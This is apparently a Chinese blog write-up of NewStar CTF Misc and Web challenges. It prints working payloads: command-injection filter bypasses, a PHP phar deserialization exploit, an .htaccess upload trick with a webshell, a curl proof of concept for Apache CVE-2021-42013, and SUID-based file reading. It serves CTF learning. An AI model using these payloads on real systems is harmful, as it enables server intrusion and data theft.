• NewStar CTF Week3Misc 4-5Web


    目录

    <1> Week-3 Misc

    (1) Whats HTTP

    (2) qsdz's girlfriend 3

    (3) WebShell!

    (4) 混沌的图像

    <1> Week-4 Web

    (1) So Baby RCE(%0A进行rce rev|sort读取flag)

    (2) UnserializeThree(%0d换行rce)

    <2> week5-web

    (1) Give me your photo PLZ(.htaccess配置文件漏洞)

    (2) Unsafe Apache(CVE-2021-42013)

    (3) So Baby RCE Again(suid-date越权读取)


    <1> Week-3 Misc

    (1) Whats HTTP

    http的包都导出来,对比一下长度 发现了这个长度比较不一样的包 追踪http流

     得到一串base64:NjY2YzYxNjc3YjM0NjYzMzMzMzYzNDM5NjQzMDMzMzA2MzM2MzczNzM4MzQzMjM2MzkzNzMxNjIzNTM0NjQ2NDM3MzI2NTYzNjU3ZA==

    解码得到:

    666c61677b34663333363439643033306336373738343236393731623534646437326563657d

    类似一一串hex编码 解码得到flag:flag{4f33649d030c6778426971b54dd72ece}

    (2) qsdz's girlfriend 3

    题目描述:

            我们入侵了qsdz的服务器,你可以在服务器中找到他真实的女朋友吗?qsdz的用户密码是Hikari(请用SSH连接)

    我们用xshell连上ssh服务

     

    在start.sh里看见flag在:/root/girlfriends/hasegawa_azusa

    尝试cat一下:
    cat: /root/girlfriends/hasegawa_azusa: Permission denied  然而没有权限

    一、cp复制出来:cp -r /root/girlfriends/hasegawa_azusa /home/flag 然后cat出来

    二、 查找系统有SUID权限的可执行文件

    发现date  date -f读取

     

    (3) WebShell!

    题目描述:

            溯源攻击者窃取的文件内容!他用了蚁剑诶? Flag格式为:flag{WebShell密码_黑客获取的用户名_机密文件内容} 例如flag{cmd_root_secret}

    可以一个一个找,也可以通过 过滤http contains "eval"看看有没有木马

    webshell密码为:

     黑客获取的用户名:

     机密文件内容:

     所以flag为:flag{n3wst4r_www-data_Y0UAr3G00D}

     

    (4) 混沌的图像

    题目描述:

            听说之前考过LSB,那你还记得那道密码题吗?"

    stefsolve 看到了一段png图片编码,save bin为flag.png

     010editor打开 文件末尾发现了参数k1,k2

     k1=3.5606267076894413,k2=3.9101741242346346,k=[106,80,198,220,47,18,19,230,42,202,207,196,214,132,188,190]

    根据题目描述联想到WEEK1 Crypto题目中的chaos

    NewStarCTF 公开赛第一周Writeup | Anyyy's Blog

    替换掉k1k2k,而c就为flag.pngrgb数值列表

    这里直接贴上现成的脚本:

    1. from PIL import Image
    2. img = Image.open('flag.png')
    3. w,h=img.size
    4. pic = []
    5. for i in range(w):
    6. for j in range(h):
    7. (r, g, b) = img.getpixel((i,j))
    8. pic.append(r)
    9. pic.append(g)
    10. pic.append(b)
    11. sum, r, k = 0, 1, [106,80,198,220,47,18,19,230,42,202,207,196,214,132,188,190]
    12. k1,k2 = 3.5606267076894413, 3.9101741242346346
    13. for i in k:
    14. sum += i
    15. r ^= i
    16. a_1 = (sum/256) % 1
    17. timea1 = 3 + int(1000 * a_1) % 30
    18. b_1 = (r/256)
    19. timeb1 = 3 + int(1000 * b_1) % 30
    20. xc_1 = a_1 * b_1
    21. yc_1 = (a_1 + b_1) % 1
    22. data = (a_1, timea1, b_1, timeb1, xc_1, yc_1)
    23. key = (k1,k2)
    24. def LC(key, x, times, flags):
    25. (k1, k2) = key
    26. xn = []
    27. xn.append(x)
    28. if flags:
    29. xn.append(1 - 2 * xn[0]**2)
    30. else:
    31. xn.append(k2 * xn[0]**3 + (1 - k2)*xn[0])
    32. for i in range(times):
    33. assert xn[i]>=-1 and xn[i]<=1 and xn[i+1]>=-1 and xn[i+1]<=1
    34. if flags:
    35. xn.append((1 - 2 * xn[i]**2)*(k1 * xn[i+1]**3 + (1 - k1)*xn[i+1]))
    36. else:
    37. xn.append((k2 * xn[i]**3 + (1 - k2)*xn[i])*(1 - 2 * xn[i+1]**2))
    38. return xn[times + 1]
    39. m, c = [], pic
    40. miu, omiga = [], []
    41. ta = timea1
    42. tb = timeb1
    43. all_list = []
    44. for flag in c:
    45. miu.append(LC(key, a_1, ta, 1))
    46. omiga.append(LC(key, b_1, tb, 0))
    47. all_list.append(((int(miu[-1] * 1000) + int(omiga[-1] * 1000))%256)^flag)
    48. delta = flag/256
    49. for i in range(3):
    50. y = (yc_1 + delta) % 1
    51. y = k1 * y**3 + (1 - k1) * y
    52. x = xc_1
    53. x = k2 * x**3 + (1 - k2) * x
    54. ta = 3 + int(1000 * x) % 30
    55. tb = 3 + int(1000 * y) % 30
    56. rgb_list = []
    57. for i in range(0, len(all_list), 3):
    58. rgb_list.append(all_list[i:i+3])
    59. width, height = 1300, 867 # flag.png的宽高
    60. new_img = Image.new('RGB', (width, height))
    61. idx = 0
    62. for w1 in range(width):
    63. for h1 in range(height):
    64. new_img.putpixel((w1, h1), tuple(rgb_list[idx]))
    65. idx += 1
    66. new_img.save('res-flag.png')
    67. new_img.show()

    运行之后得到新的图片,lsb发现flag

    <1> Week-4 Web

    (1) So Baby RCE(%0A进行rce rev|sort读取flag)

    1. if(isset($_GET["cmd"])){
    2. if(preg_match('/et|echo|cat|tac|base|sh|more|less|tail|vi|head|nl|env|fl|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["cmd"])){
    3. echo "Don't Hack Me";
    4. }else{
    5. system($_GET["cmd"]);
    6. }

    源码里preg_match过滤了好多命令,只能靠%0A多命令切换目录不断切换到/目录,发现flag

    fl被过滤用?替代,读取flag用 rev或者sort

    ?cmd=%0Acd${IFS}..%0Acd${IFS}..%0Acd${IFS}..%0Asort${IFS}ffff?lllaaaaggggg

    (2) UnserializeThree(%0d换行rce)

     查看源码发现 class.php

    访问之后得到源码:

    1. highlight_file(__FILE__);
    2. class Evil{
    3. public $cmd;
    4. public function __destruct()
    5. {
    6. if(!preg_match("/>|<|\?|php|".urldecode("%0a")."/i",$this->cmd)){
    7. //Same point ,can you bypass me again?
    8. eval("#".$this->cmd);
    9. }else{
    10. echo "No!";
    11. }
    12. }
    13. }
    14. file_exists($_GET['file']);

    file_exists()函数可触发 phar反序列化

    cmd过滤了 < > ? php和%0a 因此不可以用?>

    构造phar文件 

    1. class Evil{
    2. public $cmd;
    3. }
    4. $test = new Evil();
    5. $test->cmd= urldecode("%0d").'system("ls");';
    6. echo serialize($test);
    7. /* 文件名 */
    8. $phar = new Phar("a.phar"); //文件名
    9. $phar->startBuffering();
    10. /* 设置stub,必须要以__HALT_COMPILER(); ?>结尾 */
    11. $phar->setStub("");
    12. /* 设置自定义的metadata,序列化存储,解析时会被反序列化 */
    13. $phar->setMetaData($test);
    14. $phar->stopBuffering();
    15. ?>

     但是.phar后缀被限制了,hacker!

    我们改后缀为.png ?file=phar://路径 执行ls命令,发现flag文件

     再生成一个cat命令的phar文件重复上述操作即可得到flag

    <2> week5-web

    (1) Give me your photo PLZ(.htaccess配置文件漏洞)

    .htaccess解析漏洞,上传.htaccess 内容为:AddType application/x-httpd-php .jpg

    再次上传 123.jpg图片木马  执行 cat /flag命令后看见  那么flag就在phpinfo里

    (2) Unsafe Apache(CVE-2021-42013)

    Apache/2.4.50  存在命令执行漏洞漏洞 CVE-2021-42013

    poc:curl -v --data "echo;id" 'http://ip:port/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

     cat 即可

    (3) So Baby RCE Again(suid-date越权读取)

    ?cmd=ls / | tee 1.txt

    tee 命令外带命令执行结果

    ?cmd=cat /ffll444aaggg | tee 1.txt

    未果。。。700文件

    SUID提权:find / -perm -u=s -type f 2>/dev/null > ./1.txt

    find / -user root -perm -4000 -print 2>/dev/null

     看见date,从其他师傅处得知: date -f可以越权读取

    ?cmd=echo '' > a.php 写入一句话木马 蚁剑连接

    date -f ffl*得到flag

  • 相关阅读:
    PMP 报名有什么条件?容易满足吗?
    vue实战入门后台篇七:springboot+mybatis实现网站后台-各实体界面接口对接
    前端生成二维码
    Chrome插件精选 — 广告拦截插件
    OpenKruise原理介绍和安装
    Docker之Windows10 Docker安装详细教程
    计算机组成原理知识总结(三)存储系统
    基于ResNet-18的简单分类(新手,而且网络效果不咋滴,就是学个流程)
    再次安装pytorch
    Spring Boot 国际化 i18n
  • 原文地址:https://blog.csdn.net/weixin_63231007/article/details/127395581